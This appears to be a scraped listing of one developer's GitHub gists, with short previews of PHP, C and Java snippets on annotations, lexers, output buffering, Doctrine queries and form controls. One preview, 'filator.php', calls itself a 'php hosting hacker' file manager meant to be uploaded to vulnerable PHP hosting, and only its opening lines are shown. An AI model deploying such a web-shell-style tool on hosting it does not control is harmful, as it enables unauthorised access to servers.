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juzna / annot.php
Created February 5, 2012 12:51
PHP annotations - experiment
class Pepa {
const myConst = 1;
juzna / filator.php
Created February 4, 2012 13:02
php hosting hacker
* Simple file manager and hosting hacker
* Upload to a vulnerable PHP hosting and open :)
$self = basename($_SERVER['PHP_SELF']);
$akce = @$_GET['akce'];
$path = @$_GET['path'];
juzna / sscanf.c
Created January 26, 2012 19:37
#include <stdio.h>
int main (int argc, char **argv) {
char str[] = "image%06d.png", buf[100];
int num;
sscanf (str,"%s", buf);
printf ("%s\n", buf);
return 0;
juzna /
Created January 25, 2012 20:30
2-layer lexer for IDEA
package cz.juzna.latte.lexer;
import com.intellij.lexer.Lexer;
import com.intellij.lexer.LookAheadLexer;
import com.intellij.psi.tree.IElementType;
import com.intellij.psi.tree.TokenSet;
* Uses base-lexer to get big chunks, and several of them (typesToLex) are then lexed into smaller tokens using sub-lexer.
juzna / 01-choose.png
Created January 23, 2012 20:30
GitHub Play
juzna / final-test.php
Created January 16, 2012 17:12
Removing finals from PHP
$doRemoveFinal = true; // play with it
// Imagine your favorite library here (of course it has finals)
class A {
final function getName() { return 'A'; }
final class B {
function getName() { return 'B'; }
juzna / test-ob.php
Created January 16, 2012 13:20
PHP Output Buffer bug
$path = "/tmp/ob.log";
$logHandle = fopen($path, 'w') or die("unable to open temp file");
ob_start(function($buffer) use ($logHandle) { fwrite($logHandle, $buffer); }, 20);
echo str_repeat("0", 20); // fill in the buffer
for($i = 0; $i < 10; $i++) {
juzna / test.php
Created December 30, 2011 14:25
Doctrine partial fetch
// method 1 - partial fetch
$q = $em->createQuery("select partial a.{id,title}, length(a.body) from Model\\Article a");
$list = $q->execute();
$entity = $list[0][0];
var_dump($entity->body); // NULL as it was not fetched
juzna / datagrid.php
Created December 28, 2011 17:43
RFC: how to DataGrid
Intro: Need to display tables of content, they need to be dynamic (pagable, sortable, filterable), how to solve it?
1st - static table
juzna / EntitySelectBox.php
Created December 27, 2011 14:54
use Nette\Forms\Controls\BaseControl,
* Select box control that display entities
* @author Jan Dolecek <>